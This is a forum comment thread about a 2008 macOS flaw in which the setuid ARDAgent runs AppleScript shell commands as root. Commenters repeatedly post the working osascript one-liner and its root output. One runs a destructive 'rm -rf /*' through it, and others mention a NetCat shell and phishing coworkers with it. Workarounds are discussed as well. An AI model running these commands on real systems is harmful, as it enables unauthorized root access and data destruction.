Hmm...strange. It seems to persist some times and not other times. The exploit never seems to work after I touch the Info.plist file or Contents directory, though.

Sorry this isn't as failproof a fix as I thought. On the other hand, it still seems to require physical, logged-in access to the computer, so turn on screen lock and don't leave it unattended.

Re:Fix using Info.plist

[bussdriver]

10.5.3 and it does not plug the hole.

Re:Fix using Info.plist

[drbenru]

Or just turn on Remote Management on System Preferences Sharing and disable all privileges (the disable privileges is optional). And RESTART your computer.

I tried in every machine in my house and I kept getting the (-1708) error mentioned above. Then on the last one it worked. As I looked for a reason, I noticed the machine that it worked on had screen sharing and remote management disabled in the Sharing Pane of System Preferences, while the rest of my machines have remote management to only allow me to access.

I enabled Remote Management and it plugged this particular ARDAgent hole. I tried on one of my machines that had Remote Management already on to disable it, and the exploit works, but as I turned Remote Management back on it didn't plug the hole right away. So I restared and the fix worked.

Obviously this only fixes the ARDAgent use, it doesn't fix the essential flaw in Applescript to allow an app running as root to receive script commands from a non root app.

NetCat + ARDAgent escalation video posted

[bitshark]

I've compiled and posted a video of this in action and mixed in a bit of NetCat, thus providing an interactive shell for convenience. Check it out at http://fieryferret.com/ard_hack/

Re:Oh good

[CrazedWalrus]

Try being nice to them and treating them as equals. They hate that.

Re:This is a serious privilege escalation bug, but

[mabinogi]

KDE opens a dialog and asks you if you want the CD to be mounted

I call those "Should I do something stupid" dialogs. Just out of interest, under which circumstances do you _not_ want a data CD to be mounted when you insert it in your drive?

Your average optical drive is rather expensive to use as a CD case you know.

My mistake

[Macka]

Ah, now I understand what you meant. I just SSH'd into a headless Mac Mini I have and tried it. It kicks out the message:

pebbles: ~ $ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
_RegisterApplication(), FAILED TO establish the default connection to the WindowServer, _CGSDefaultConnection() is NULL.

Then after a timeout delay it returns with an error:

23:47: execution error: ARDAgent got an error: Connection is invalid. (-609)

So someone has to be logged into the Desktop at the same time the command is issued (even if issued remotely) and I'm guessing that the account the remote user is logged into probably has to be the same account the desktop user is using.

So Xserve servers should be immune to this via SSH, unless someone else is actively using Remote Desktop at the same time. Interesting!

Intruder?

[codeboost]

On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out. That is, if the intruder is a thief who visits your home while you're away. However, if the intruder is a business associate or 'friend', or girlfriend who runs this exploit while you're answering nature's call or visiting the fridge to get some more beer, it's a bit more serious ;).

You don't need to call osascript in Terminal

[Schlaefer]

if you are in Script Editor (AppleScript) already.

Nice try script kiddie. ;)

Re:You don't need to call osascript in Terminal

[theolein]

I know that, it was a quick sample via copy/paste, that's all. (I'm also a bit old to be a script kiddie and I take my job being a sysadmin to a company full of Macs quite seriously). What is important is the concept combining a real root escalation with a social engineering attack. This kind of attack is very common on Windows and Mac users should not be complacent that it couldn't happen to them.

I tested the above sample on some users at work and they *all* opened the app. And someone could easily spoof the email sender...

Even better question

[Moraelin]

My even better question is: why is "bah, it requires physical access" seen as an automatic "don't worry about it" around these parts?

Yes, maybe a home computer doesn't have more people logging in. But:

- Workstations at work have lots of people who can log into them. If I come really early or stay late, I can go to any workstation (and a few laptops) in the building and log in with my own account. If it's possible to escalate your rights from there, I could get access to everyone's local and temporary files. Go see what the department boss is doing. Go see with which suppliers do the purchasing guys deal. I'm sure their competitors will love knowing what kind of discount they could negotiate and still steal that contract. Walk to the other building and get the CAD guys' designs.

Plus there are a lot of people who can physically get near any computer, up to CEO level. Like, say, the janitors.

- Servers even more so. There are servers where hundreds of people can log in. If you can escalate your rights to root, you can get to their files. Or you can install some rootkit on the bloody server. Or even one disgruntled L1 support guy about to quit can escalate his rights, reconfigure the backups, and do a "rm -rf /". Etc.

So basically not arguing with your point, but even _if_ the answer were "OMG, you need to be physically at that computer" or "OMG you'd need to be logged in anyway", it still wouldn't be much of a saving grace. There _are_ more uses for computers than as someone's email and surfing rig at home.

Re:Even better question

[TrekkieGod]

My even better question is: why is "bah, it requires physical access" seen as an automatic "don't worry about it" around these parts?...Workstations at work have lots of people who can log into them...Plus there are a lot of people who can physically get near any computer, up to CEO level. Like, say, the janitors.

The reason that requiring physical access is seen as no big deal is because all that stuff you're worried about is something I can do without the need of any exploits.

Got a machine with literally any operating system? All I need is to reboot the computer with a linux live cd (or usb thumb drive) and I get read / write access to everywhere. From there I can plant trojans, read your files, do whatever.

Got a Linux machine? I can reboot and use grub to boot into single-user mode. There you go, I'm root. I can do all the of the above again.

The only way to have any security at the physical level is with encryption. And when we see encryption exploits, we do get hyped up about it. Even with encryption, more security measures still need to be taken at the physical level. A physical keylogger between the keyboard and computer could be installed to discover typed passwords, etc.

That said, an exploit is an exploit, and it should be treated as such. Physical-access only just means there's less to worry about.

Re:Can we get some sources?

+++ doesn't precede NO CARRIER like that. It's for switching your terminal mode to issue AT commands directly to the modem. For example if you type +++ATH^æéWÔ5áX6Ë\SSÎh@'ÖØ

NO CARRIER

Guest Access

[hack101]

Confirmed that anyone logged in as Guest (supposed to be a low-privilege account) can use this exploit to get to root.
macbookpro:~ Guest$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root
Next time your at one of those shows where they have supposedly locked-down machines for webmail etc you know how much to trust them...

50%? Really? Seems high.

[sofla]

Given that the exploit requires ARD the 50% statistic seems unlikely to me. At the very least, I seem to be in the other 50%:

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

23:47: execution error: ARDAgent got an error: Connection is invalid. (-609)

Doesn't work for standard users

[gozar]

I just tried this on an Intel Macbook running 10.5.3 and a PPC iMac with 10.4.11.

• Login in to Macbook as a user with administrator access, ran it from a terminal:
  root
• ssh'd into Macbook as standard user, administrator user logged into Aqua:
  23:47: execution error: ARDAgent got an error: AppleEvent timed out. (-1712)
• ssh'd into the iMac as an administrator user, a standard user is logged into Aqua:
  kCGErrorRangeCheck : Window Server communications from outside of session allowed for root and console user only INIT_Processeses(), could not establish the default connection to the WindowServer.Abort trap
• ssh'd into the iMac as a standard user, standard use is logged into Aqua:
  23:47: execution error: ARDAgent got an error: AppleEvent timed out. (-1712)

So apparently this only works when an administrator user is logged into the machine, so the effects should be minimal. At the very least, if you leave your machine open, anyone can open a terminal and get root without knowing your password.

I also wasn't able to get it to open any application as root, such as: osascript -e 'tell app "ARDAgent" to do shell script "open -a \"System Preferences.app\""';

Just remove the setuid bit?

Why not just remove the setuid bit?

cd /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/
sudo chmod 755 ARDAgent

-> osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
not_root
->

Re:Just remove the setuid bit?

[v1]

ARD has a "do shell command" function in the admin. That's probably what's supposed to use this function. So if you strip the setuid bit, that function of ARD will be disabled.

Re:Just remove the setuid bit?

[mario_grgic]

So why not simply remove execute bit for "others". That way users that are not root or part of the wheel group can not execute ARDAgent and assume root privileges (since it has setuid bit set).

Re:Just remove the setuid bit?

[v1]

would need to know more about why it's there to begin with. The executable is used by ARD's "send shell command" function. It's the part of the ARD client on the computer that actually performs shell commands received that came from a remote ARD Admin. Speculating since I didn't code the thing, the "user" that generates this request inside the ARD client after receiving the request from an admin is probably not a privileged user, and that's why this executable is setuid, so it can perform the tasks sent to it, as root. So removing the setuid bits WILL "fix" the security hole, but are likely to disable this part of ARD. It wouldn't surprise me if this executable is used for numerous other ARD commands. Other commands such as "restart computer" may be done via this. It's possible that most of the ARD Admin commands are accomplished through this executable for this reason.

I have yet to see anyone test ARD to discover the effect of clearing these bits though, which is rather surprising.

Re:Can we get some sources?

[redxxx]

Ditto, same error and set up. I don't know why it doesn't work, which doesn't make it exactly comforting that this does not work.

I don't play with Macs hard enough to know if it actually indicates anything, or if I just need an extra flag or something.

Re:Oh good

[redxxx]

This bug is nothing to scoff at, but it does really only affect people who have untrusted users with local/pseudo-local access to machines, and that group already has increased security concerns regardless of bug like this. So, in fewer words enterprise? The same group which, it would seem, have a need for using ARD for remote management? The same group that will download and run any damn thing attached to an e-mail or embedded into a document(wouldn't this still be effective attack vector for the terminally stupid?).

Re:Oh good

[street+struttin']

Before OSX, there were all kinds of hacks you could do in the Mac labs. I never even bothered to log into them most of the time, you could get access with a few key strokes. I guess that shows my age though. There probably haven't been OS9 labs in the schools for a while now...

Re:Only need a shell....

[roscocoltran]

Same here, the command worked once, but when I tried the same command again, I got the same error message than you. On a powerkook 10.5.3. On a macbook pro 10.5.3, the command works everytime. I can't find the difference in the config, only in the hardware.

either way it's a bug in osascript

[mehemiah]

the osascript command should run whatever commands as the user so it should setuid whatever app its sending the apple event, (in other words setuid what ever its telling "to do shell script" to the user osascript is running as)

Re:This is a serious privilege escalation bug, but

[hobbit]

Related to the "should I do something stupid" dialog is the "type your admin password to continue" dialog that it's impossible to prevent Apple's installer popping up even if you, the developer, only want to install things in ~/Library rather than /Library.

Thanks, Apple, for training your users these last 8 years to type their admin password at the drop of a hat.

Re:This is a serious privilege escalation bug, but

[greed]

Any circumstances where the OS has an "auto run" or "dig through the CD and find out what's on it" function.

Heck, even JPEGs have been used for attack vectors... there can be bugs in any decode program, so on no account should the OS do anything automatically to removable/hotpluggable media.

There are even DOS attacks you can do with mal-formed ISO9660 filesystems. I've kernel panicked big UNIX servers with bad CDs; back when mkisofs had more bugs and I didn't know how to use it....

Any time a computer trusts user-provided data to be correctly formed, you've got a problem.

Re:This is a serious privilege escalation bug, but

[Ilgaz]

There are 3 antivirus programs on OS X which are even higher priced than Windows versions using end users CPU on an OS without any known self propagating virus/worm.

All those 3 uses considerable amounts of CPU while claiming they use "Heuristics".

These kinds of issues are happening on all operating systems while I am sure a good commercial antivirus claiming true heuristics would create circus on desktop if one tries to exploit something like that.

Users of these 3 antiviruses (newly released Avast doesn't count, Clam doesn't count) should use it as a benchmark to see if they are sparing their CPU cycles to nothing or not. These kinds of basic issues are great to use as a benchmark of security tools. Especially companies I should say.

Re:Root via OS X install DVD

[Ilgaz]

Not saying to devalidate your post (which is true) but for the concerned, Apple Open Firmware/EFI Password can be enabled by following instructions at http://support.apple.com/kb/HT1352 . If I had a laptop instead of desktop, I would enable it directly.

Blocks the ability to use the "C" key to start up from an optical disc.
Blocks the ability to use the "N" key to start up from a NetBoot server.
Blocks the ability to use the "T" key to start up in Target Disk Mode (on computers that offer this feature).
Blocks the ability to start up in Verbose mode by pressing the Command-V key combination during startup.
Block the ability to start up a system in Single-user mode by pressing the Command-S key combination during startup.
Blocks a reset of Parameter RAM (PRAM) by pressing the Command-Option-P-R key combination during startup.
Requires the password to use the Startup Manager, accessed by pressing the Option key during startup (see below).
Requires the password to enter commands after starting up in Open Firmware, which is done by pressing the Command-Option-O-F key combination during startup.
Blocks the ability to start up in Safe Boot mode by pressing the Shift key during startup.

(Similar stuff on Intel)

Re:This is a serious privilege escalation bug, but

[petermgreen]

if you insert a Ubuntu CD in Ubuntu it recognizes that there are packages there and will ask if you want to have the CD added to your repositories. Yet no software will be installed automatically.
By adding a repositry to your apt sources you are placing a huge level of trust in the admins of that repositry. That repositry can trivially provide "updated" versions of core system packages so that on the next upgrade run the scripts included in those packages will be executed as root.

Re:This is a serious privilege escalation bug, but

[argent]

I'm sorry, I don't quite understand. Are you agreeing with me, disagreeing with me, or making a comment about a related issue... and are you recommending or debunking antivirus software on OS X?

Security Theatre, nobody is immune...

[argent]

Related to the "should I do something stupid" dialog is the "type your admin password to continue" dialog

Actually, for most of the places that dialog pops up, it's not a stupid security dialog. It's verifying that the person sitting in front of the screen is actually authorized to perform an action. The problem is:

1. Because this option is available, Apple hasn't bothered to figure out if there's a less dangerous way of performing a particular action.

2. As you say, it gets invoked in many cases where it's not necessarily going to be required, rather than being deferred until you actually require elevated privileges.

3. Related to the first point, it's led to the use of root privileges where lesser privileges would have sufficed.

4. There are some cases where this dialog is invoked as a stupid security dialog, where you don't actually require elevated privileges at all.

And related to this is the idea that creating an installer is necessary or even desirable. The ONLY time you should need an actual installer is when your application actually needs to install something into /Library, *and* this decision can't be deferred until first run. Like a device driver, for example.

And related to that is the additional restrictions Apple has imposed in Leopard, for example requiring certain plugins to be installed in /Library rather than ~/Library.

Security Theatre, nobody is immune. I've run into all four of the points (1..4) above in UNIX applications, all the way back to when I was at Berkeley in the late '70s. Requiring root to access privileged ports in the BSD TCP stack is a perfect example of security theatre making a system less secure.

The price of security is eternal vigilance, and this is the kind of chickenshit stuff nobody bothers to be vigilant against.

Re:Security Theatre, nobody is immune...

[hobbit]

Actually, for most of the places that dialog pops up, it's not a stupid security dialog. It's verifying that the person sitting in front of the screen is actually authorized to perform an action. No, it is a stupid security dialog. Not because you shouldn't need elevated permissions to install something in /Library; not because you shouldn't need to type your password to gain those elevated permissions; but because you should be able to create an installer using Apple's tools which, by default, puts things in ~/Library. I don't agree that "most" of the places that dialog pops up are unrelated to Installer.app.

You can argue that the burden is on each individual developer to create drag-to-install apps which write to ~/Library when first run, but for one reason or another (often related to customer expectations), people do create installers. It also rather reduces the appeal of drag-to-install if it leaves lots of things in Library folders, i.e., it's not drag-to-uninstall.

The reason Apple is culpable is that they have made it easy to create installers, but only installers that require you to type your admin password. They've done nothing to alleviate the problem of security theatre, and everything to exacerbate it.

Hamish

Re:Security Theatre, nobody is immune...

[argent]

I don't agree that "most" of the places that dialog pops up are unrelated to Installer.app.

Most of the places that dialog pops up for me are to unlock Preferences and to unlock my keychain, or to run an application with elevated privilege, or to authenticate Finder to copy a file to (for example) another user account.

Perhaps if I was installing lots of applications all the time I'd have a different experience.

The reason Apple is culpable is that they have made it easy to create installers, but only installers that require you to type your admin password.

Indubitably, but compared to the Safari/LaunchServices Security Theatre this is a peccadillo. Also... I find quite a lot of installers happily run to completion without ever asking me for my password. Are they just emulating Apple's installer, or what?

Re:Security Theatre, nobody is immune...

[hobbit]

Most of the places that dialog pops up for me are to unlock Preferences and to unlock my keychain, or to run an application with elevated privilege, or to authenticate Finder to copy a file to (for example) another user account. The keychain password dialog is (and looks) different, but your point is taken. However, authenticating Finder or System Preferences is a bit different. Imagine you were writing a trojan. You could have it sit in the background, waiting until it sees Installer.app and then popping up its fake admin password request. It would be much harder to get it to pop up at the right time for Finder (when you try to copy a file you don't have permissions for) or System Prefs (when you click on a padlock).

As for running an app with elevated privilege, well, maybe Granny would think twice about okaying that indiscriminately if she wasn't accustomed to that dialog popping up so much.

Perhaps if I was installing lots of applications all the time I'd have a different experience. It's not that I install apps all the time. It's just that I don't change System Preferences or use Finder to copy unauthorized files all the time :)

Indubitably, but compared to the Safari/LaunchServices Security Theatre this is a peccadillo. Agreed. But it could be a greater security threat overall: 8 years is a lot of training to undo.

Also... I find quite a lot of installers happily run to completion without ever asking me for my password. Are they just emulating Apple's installer, or what? They probably just don't want to install anything to any Library folder.

Re:Security Theatre, nobody is immune...

[argent]

My experience is that once people are in the habit of approving security theatre dialogs, it doesn't matter what the dialog looks like. They just go ahead and approve them all.

Now if I was writing a trojan that was going to piggyback on the execution of a privileged program, I wouldn't even bother bringing up my own dialog... I'd use Mach injection to modify a program that's already raising its privilege, and change what it runs on teh other side of the privilege boundary. Now if I was going to attack someone who was smart enough to remember to lock his keychain and preferences when he's not using them, I'd take advantage of the race condition I alluded to in a previous message.

Back to my original point, many messages back, compared to the kind of security theatre that makes remote execution attacks possible, like the Safari/LaunchServices one, this one is minor. Because if you're in a position to perform a privilege elevation attack on a desktop OS you've pretty much already got all the rights you need to completely bone the owner, just by getting local user privileges.

And getting back to "Security Theatre, nobody is immune...", my point was that it's not just Microsoft that's guilty of security theatre, Apple, Mozilla, AT&T, UCB, you name it, they've all done it.

8 years is a lot of training to undo.

It's 11 years last month for Microsoft's remote execution design flaw, the one that they've been trying to solve with security theatre for, well, 11 years. Apple's remote execution security theatre only lasted three.

I'm not saying that Apple's innocent here, just that requiring the guy sitting at the desk to occasionally verify that they're not someone who just walked up to an unwatched keyboard isn't an inherently bad idea... the way asking "should I do something really really stupid" is.

Re:Oh good

[Sentry21]

Oh! A sarcasm detector! THAT'S useful.

How do you want to mount a CD?

[argent]

Just out of interest, under which circumstances do you _not_ want a data CD to be mounted when you insert it in your drive?

I'm talking about autorun being the "stupid thing"... not automount.

However, now that you mention it, it should probably pop up a dialog asking how you want to mount it:

1. Should the mount honor the execute bit or not?
2. Should the mount honor setuid/setgid bits or not?
3. Should the mount honor device nodes or not?
4. Should the mount honor access permissions or not?

If you're not logged in as a privileged user, you probably shouldn't get options 2 or 3, and the CD should probably be mounted as if all the files were owned by you.

And, finally, I often want to insert a CDROM to copy it, or to examine it with a file system analysis tool. So "don't mount it, ignore it" should be an option.

Linux autorun... yes, it's real.

[argent]

KDE opens a dialog and asks you if you want the CD to be mounted

OK, I missed this, I read this as "KDE opens a dialog and asks you if you want the CD to be executed" or something like that, because my new day job involves writing software for Linux, so I've occasionally got to test software on a variety of Linux boxes and we have a rack of test boxes running a set of bog standard Linux installs (they wouldn't be much good as test boxes if they'd been customized) and when you stick a CD containing a shell script called "/autorun" in many of these boxes, it pops up a dialog asking if it should *execute* that file.

Yes, really.

I think this happens on Gnome-based boxes rather than KDE, but it regularly happens.

There's actually a spec for this kind of craziness: Desktop Application Autostart Specification... look under "Autostart Of Applications After Mount".

Here's what I wrote in 2006 when I first read about the spec: Linux is not Windows.

Combined with the behavior you're describing this is doubly stupid, because someone used to KDE would be likely to reflexively hit that "please infect my computer" button before noticing that it's not asking to mount the CD.

Re:This is a serious privilege escalation bug, but

[prichardson]

Thanks for this post.

*quietly unchecks a certain checkbox*

Unfortunately, many people have user settings from when opening safe files WAS enabled by default (like me). All apple upgrades preserve user settings, so many people still have that little box checked.

Re:This is a serious privilege escalation bug, but

[argent]

Autorun is worse than things like bugs in JPG or bugs in file systems.

Bugs, you can fix.

When the security flaw is in the design you can't fix it without breaking stuff that was written based on the flawed design.

THe poster boy for this phenomenon, of course, is the Microsoft HTML control, Internet Explorer, and ActiveX. :)

It's a bug in Apple Remote Desktop.

[argent]

All osascript is doing is compiling and running 'tell application "ARDAgent" to...' as the logged in user. The application "ARDAgent" is already running as root, and accepting '... do shell script "..."' and running it. If ARDAgent is not running, then the osascript command just hangs waiting for it to start up (as it does on my computer, because I don't have Apple Remote Desktop running).

The bug is that ARDAgent's applescript library blithely executes "do shell script".

Re:It's a bug in Apple Remote Desktop.

[mehemiah]

I don't remember enabling ard. when do you do that? isn't that a sharing prefrence?

What other privileged commands are exposed?

[argent]

What other applications running with elevated privileges accept random Applescript from any random yobbo?

Most commands I've tried respond with "syntax error: No user interaction allowed. (-1713)".

You don't need physical access.

[argent]

You just need the ability to execute applescript on the machine.

It's not quite as easy as passing in an "applescript:" URL, at least...

An external application must be launched to handle applescript: links.

Requested link:

applescript:do%20shell%20script%20%22whoami%22

Application: Script Editor

Re:This is a serious privilege escalation bug, but

[magus_melchior]

And on top of that, many linux distros have resurrected the absolutely insane concept of Autorun CDs, something Apple was smart enough to abandon back in the dark ages of floppy distribution.

I'm going to go out on a limb and guess you weren't referring to bootable or "live" CDs (and unless they've changed policies since the original OS X, you can still restore or nuke your Mac by booting from the system discs), but the annoying and potentially dangerous concept of autostarting an application when a CD is inserted. Either way requires physical access to the machine, unless you rookit in and use a virtual device reading an image file... then we get into the fan-favorite "running Linux inside a VM on BeOS in a VM on Amiga..." scenario.

Re:This is a serious privilege escalation bug, but

[argent]

but the annoying and potentially dangerous concept of autostarting an application when a CD is inserted.

Indeed.

Either way requires physical access to the machine

I don't need physical access to the machine to distribute malware on a CD. I just need to distribute a CD that will launch said malware when it's inserted, and let my victims provide the physical access part at their leisure.

Re:This is a serious privilege escalation bug, but

[mabinogi]

that's auto-run, not auto-mount.

Nope.

[pwhysall]

Scenario:

I'm the only user logged in, and I have a keyboard onto an OS X box. I cannot access the box itself.

I plug in my EVUL USB KEY OF DEWM (into the USB port on the keyboard), go Apple->Restart, it does so, I hold down OPTION, I get to choose to boot off the EUKoD.

Re:Nope.

[TheNetAvenger]

I plug in my EVUL USB KEY OF DEWM (into the USB port on the keyboard), go Apple->Restart, it does so, I hold down OPTION, I get to choose to boot off the EUKoD.

Then this is another OS X flaw... If boot privledges cannot be pre-empted from USB or CD/DVD drives, an OS X machine cannot ever be secured...

Want to reconsider stating that you can't preempt USB booting?

Re:Nope.

[TheNetAvenger]

Less than thirty seconds on google would show you that you CAN, and exactly how to do it.

Which was my point EXACTLY,re-read my post. I was mocking the fact someone would assert that user access level vulnerbility is NOT major since they could use a USB device to boot hack the OS.

But no. Actually googling something or reading the documentation would take valuable time away from your trolling and astroturfing, wouldn't it? It's much faster and easier to just make shit up.

Just re-read the post before you jump on the wrong person and be a dick.

yes

[commodoresloat]

it can also be replaced with "Whooooooosh!"

;)

Re:This is a serious privilege escalation bug, but

[Ilgaz]

I agree with you, I just say this issue should be used to debunk the junk which claims to do heuristics wasting user CPU. If something does heuristics on an OS without any known viruses, it should really do it. I am speaking about pro active security like "what launches what, what did user do". All serious antivirus on Windows does it and Mac antivirus doesn't while it is more expensive than Windows one.

Needs local access? LOL

[blast3r]

"since this exploit seems to require physical access to the machine to be rooted," Excuse me but this is absolutely false. Anyone that has remote access to this system as a regular user can launch the exploit. Are you saying that you have to be actually sitting at the keyboard to run Apple Script? !!???

What can it do?

[TexPhoto]

OK, I am interested in this, but having a little trouble understanding what this exploit can do. I ran the default script, and yes, it did return "root". But, can it do practical things? Can it create a user? Reveal/change passwords for existing users? Delete files? Can it run the dreaded rm *.*? I have two powerbooks sitting around that have leopard I could blow away if someone can suggest commands to run. I'll report the results.

Re:What can it do?

[TexPhoto]

Using an old powerbook I had with Leopard installed, I issued the command: osascript -e 'tell app "ARDAgent" to do shell script âoerm â"rf /*â '; That destroyed the system. It kept running, but the system preferences could not be accessed, and the machine began to lock up. It would no longer boot.

Old news, but just cursory examination...

[Winged]

I dunno if anyone's actually looked at this, but it's a lot worse than "requires physical access". For example...

1) Any program running on your system automatically can run AppleScript.
2) Any system configured to do load sharing via Xgrid can have commands injected that will do this sort of thing.
3) Anyone who can access the machine from remote can do it, including via VNC.

osascript -e 'tell app "ARDAgent" to run shell script "chmod -r ugo-rwx /System/Library/RemoteManagement/ARDAgent.app"'

but re-run it after doing any kind of "repair permissions" on the volume.